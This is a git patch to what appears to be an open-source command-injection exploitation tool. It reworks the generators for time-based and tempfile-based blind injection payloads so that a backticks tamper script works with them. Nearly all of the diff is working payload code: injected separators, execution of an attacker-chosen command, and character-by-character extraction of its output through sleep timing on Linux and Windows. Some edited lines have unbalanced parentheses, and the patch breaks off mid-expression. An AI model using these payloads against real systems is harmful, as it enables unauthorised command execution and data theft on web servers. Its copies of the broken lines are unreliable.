From 79909148b3aa7e45d0d2f09e08d4c2d7638cd832 Mon Sep 17 00:00:00 2001 From: stasinopoulos Date: Mon, 13 Jan 2025 08:29:40 +0200 Subject: [PATCH] mprovement regarding tamper script "backticks.py" for supporting time-related techniques (i.e. "time-based", "tempfile-based"). --- doc/CHANGELOG.md | 3 + .../techniques/time_based/tb_payloads.py | 256 ++++++++--------- src/core/injections/controller/checks.py | 8 +- src/core/injections/controller/controller.py | 30 +- src/core/injections/controller/handler.py | 10 +- .../techniques/classic/cb_payloads.py | 101 ++----- .../techniques/file_based/fb_payloads.py | 12 +- .../techniques/tempfile_based/tfb_payloads.py | 258 ++++++++---------- src/core/tamper/backticks.py | 7 +- src/utils/settings.py | 21 +- 10 files changed, 324 insertions(+), 382 deletions(-) diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md index e9020a81f0..3738be395f 100755 --- a/doc/CHANGELOG.md +++ b/doc/CHANGELOG.md @@ -1,3 +1,6 @@ +## Version 4.1 (TBA) +* Revised: Improvement regarding tamper script "backticks.py" for supporting time-related techniques (i.e. "time-based", "tempfile-based"). + ## Version 4.0 (2024-12-20) * Fixed: Multiple bug-fixes regarding several reported unhandled exceptions. * Revised: Minor bug-fix regarding tamper script "backticks.py" diff --git a/src/core/injections/blind/techniques/time_based/tb_payloads.py b/src/core/injections/blind/techniques/time_based/tb_payloads.py index 140aa9111b..37a49cc14c 100755 --- a/src/core/injections/blind/techniques/time_based/tb_payloads.py +++ b/src/core/injections/blind/techniques/time_based/tb_payloads.py @@ -34,8 +34,8 @@ def decision(separator, TAG, output_length, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none write '" + TAG + "'.length\"') " @@ -46,38 +46,35 @@ def decision(separator, TAG, output_length, timesec, http_request_method): else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(echo " + TAG + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne $str1 ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=$(echo " + TAG + ")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq $str1 ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(output_length) + " -ne $(echo " + TAG + settings.SINGLE_WHITESPACE + - pipe + "tr -d '\\n' " + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + "echo " + TAG + settings.SINGLE_WHITESPACE + + pipe + "tr -d '\\n' " + pipe + "wc -c" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass @@ -96,40 +93,38 @@ def decision_alter_shell(separator, TAG, output_length, timesec, http_request_me "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -138,9 +133,8 @@ def decision_alter_shell(separator, TAG, output_length, timesec, http_request_me pipe = "|" payload = (pipe + # Find the length of the output, using readline(). - "[ " + str(output_length) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + TAG + "\'))\")] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass @@ -171,8 +165,8 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c \"" + @@ -183,30 +177,31 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): else: settings.USER_APPLIED_CMD = cmd + cmd_exec = cmd + if settings.USE_BACKTICKS: + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX if separator == ";" or separator == "%0a": payload = (separator + - "str=\"$(echo $(" + cmd + "))\"" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + separator + #"str1=${%23str}" + separator + - "str1=$(expr length \"$str\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length \"$str\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne $str1 ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0" + separator + - "str=$(echo $(" + cmd + "))" + separator + + "str=" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + separator + # Find the length of the output. - "str1=$(expr length $str)" + separator + + "str1=" + settings.CMD_SUB_PREFIX + "expr length $str)" + separator + #"str1=${%23str} " + separator + "[ " + str(output_length) + " -eq $str1 ]" + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -214,10 +209,9 @@ def cmd_execution(separator, cmd, output_length, timesec, http_request_method): elif separator == "||" : pipe = "|" payload = (pipe + - "[ " +str(output_length)+ " -ne $(echo -n \"$(" + cmd + ")\" " + - pipe + "tr -d '\\n' " + pipe + "wc -c) ] " + separator + - "sleep " + str(timesec) + - separator + "[ " +str(output_length)+ " -ne " + settings.CMD_SUB_PREFIX + "echo -n \"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" " + + pipe + "tr -d '\\n' " + pipe + "wc -c" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass @@ -235,40 +229,38 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(output_length) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(output_length) + " -ne ${str1} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi " + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi " ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + # Find the length of the output, using readline(). - "str1=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\")" + separator + + "str1=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\"" + settings.CMD_SUB_SUFFIX + separator + "[ " + str(output_length) + " -eq ${str1} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\") " + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\") " ) separator = _urllib.parse.unquote(separator) @@ -277,9 +269,8 @@ def cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_reque pipe = "|" payload = (pipe + # Find the length of the output, using readline(). - "[ " + str(output_length) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'$(echo $(" + cmd + "))\'))\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(output_length) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(len(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'))\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: pass @@ -307,8 +298,8 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + ampersand = _urllib.parse.quote("&") payload = (ampersand + "for /f \"tokens=*\" %i in ('cmd /c \"powershell.exe -InputFormat none write ([int][char](([string](cmd /c " + @@ -317,38 +308,39 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met ) else: + cmd_exec = cmd + if settings.USE_BACKTICKS: + cmd_exec = settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX settings.USER_APPLIED_CMD = cmd if separator == ";" or separator == "%0a" : payload = (separator + # Grab the execution output. - "cmd=\"$(echo $(" + cmd + "))\"" + separator + + "cmd=\"" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "\"" + separator + # Export char-by-char the execution output. - "char=$(expr substr \"$cmd\" " + str(num_of_chars) + " 1)" + separator + + "char=" + settings.CMD_SUB_PREFIX + "expr substr \"$cmd\" " + str(num_of_chars) + " 1" + settings.CMD_SUB_SUFFIX + separator + # Transform from Ascii to Decimal. - "str=$(printf '%d' \"'$char'\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "printf '%d' \"'$char'\"" + settings.CMD_SUB_SUFFIX + separator + # Perform the time-based comparisons "if [ " + str(ascii_char) + " -ne $str ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi " + - separator + "fi " ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + # Grab the execution output. - "cmd=\"$(echo $(" + cmd + "))\"" + separator + + "cmd=\"" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd_exec + settings.CMD_SUB_SUFFIX + settings.CMD_SUB_SUFFIX + "\"" + separator + # Export char-by-char the execution output. - "char=$(expr substr \"$cmd\" " + str(num_of_chars) + " 1)" + separator + + "char=" + settings.CMD_SUB_PREFIX + "expr substr \"$cmd\" " + str(num_of_chars) + " 1" + settings.CMD_SUB_SUFFIX + separator + # Transform from Ascii to Decimal. - "str=$(printf '%d' \"'$char'\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + "printf '%d' \"'$char'\"" + settings.CMD_SUB_SUFFIX + separator + # Perform the time-based comparisons "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) separator = _urllib.parse.unquote(separator) @@ -356,11 +348,10 @@ def get_char(separator, cmd, num_of_chars, ascii_char, timesec, http_request_met elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + cmd + pipe + "tr -d '\\n'" + + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + cmd + pipe + "tr -d '\\n'" + pipe + "cut -c " + str(num_of_chars) + pipe + "od -N 1 -i" + - pipe + "head -1" + pipe + "awk '{print$2}') ] " + separator + - "sleep " + str(timesec) + - separator + pipe + "head -1" + pipe + "awk '{print$2}'" + settings.CMD_SUB_SUFFIX + " ]" + separator + + "sleep " + str(timesec) ) else: pass @@ -379,38 +370,36 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + python_payload + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\")" + separator + - "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) separator = _urllib.parse.unquote(separator) @@ -418,9 +407,8 @@ def get_char_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'$(echo $(" + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\") ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + "[ " + str(ascii_char) + " -ne " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(ord(\'" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + "))\'[" + str(num_of_chars-1) + ":" +str(num_of_chars)+ "]))\nexit(0)\") ] " + separator + + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + pipe + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX ) else: @@ -451,8 +439,8 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me "cmd /c \"powershell.exe -InputFormat none Start-Sleep -s " + str(2 * timesec + 1) + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c \"" + @@ -464,23 +452,21 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me else: if separator == ";" or separator == "%0a": payload = (separator + - "str=\"$(" + cmd + ")\"" + separator + + "str=\"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\"" + separator + "if [ " + str(ascii_char) + " -ne $str ]" + separator + "then sleep 0" + separator + "else sleep " + str(timesec) + separator + - "fi" + - separator + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + "sleep 0 " + separator + - "str=\"$(" + cmd + ")\" " + separator + + "str=\"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" " + separator + "[ " + str(ascii_char) + " -eq $str ] " + separator + - "sleep " + str(timesec) + - separator + "sleep " + str(timesec) ) @@ -489,9 +475,8 @@ def fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_me elif separator == "||" : pipe = "|" payload = (pipe + - "[ " + str(ascii_char) + " -ne \"$(" + cmd + ")\" ] " + separator + - "sleep " + str(timesec) + - separator + "[ " + str(ascii_char) + " -ne \"" + settings.CMD_SUB_PREFIX + cmd + settings.CMD_SUB_SUFFIX + "\" ]" + separator + + "sleep " + str(timesec) ) else: pass @@ -509,38 +494,36 @@ def fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, htt "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + settings.SINGLE_WHITESPACE + "for /f \"tokens=*\" %i in ('cmd /c " + cmd + "') do if %i==" + str(ascii_char) + settings.SINGLE_WHITESPACE + - "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + ")\"" + "cmd /c " + settings.WIN_PYTHON_INTERPRETER + " -c \"import time; time.sleep(" + str(2 * timesec + 1) + settings.CMD_SUB_SUFFIX + "\"" ) else: if separator == ";" or separator == "%0a": payload = (separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\")" + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\"" + settings.CMD_SUB_SUFFIX + separator + "if [ " + str(ascii_char) + " -ne ${str} ]" + separator + - "then $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\")" + separator + - "else $(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + separator + - "fi" + - separator + "then " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\"" + settings.CMD_SUB_SUFFIX + separator + + "else " + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + settings.CMD_SUB_SUFFIX + "\"" + settings.CMD_SUB_SUFFIX + separator + + "fi" ) - elif separator == "&&" : - separator = _urllib.parse.quote(separator) + elif separator == _urllib.parse.quote("&&") : + #separator = _urllib.parse.quote(separator) ampersand = _urllib.parse.quote("&") payload = (ampersand + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + - "str=$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"print($(echo $(" + cmd + ")))\n\")" + separator + - "[ " + str(ascii_char) + " -eq ${str} ] " + separator + - "$(" + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(" + str(timesec) + ")\")" + - separator + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"import time\ntime.sleep(0)\") " + separator + + "str=" + settings.CMD_SUB_PREFIX + settings.LINUX_PYTHON_INTERPRETER + " -c \"print(" + settings.CMD_SUB_PREFIX + "echo " + settings.CMD_SUB_PREFIX + cmd + ")))\n\"" + settings.CMD_SUB_SUFFIX + separator + + "[ " + str(ascii_char) + " -eq ${str} ] " + separator + + 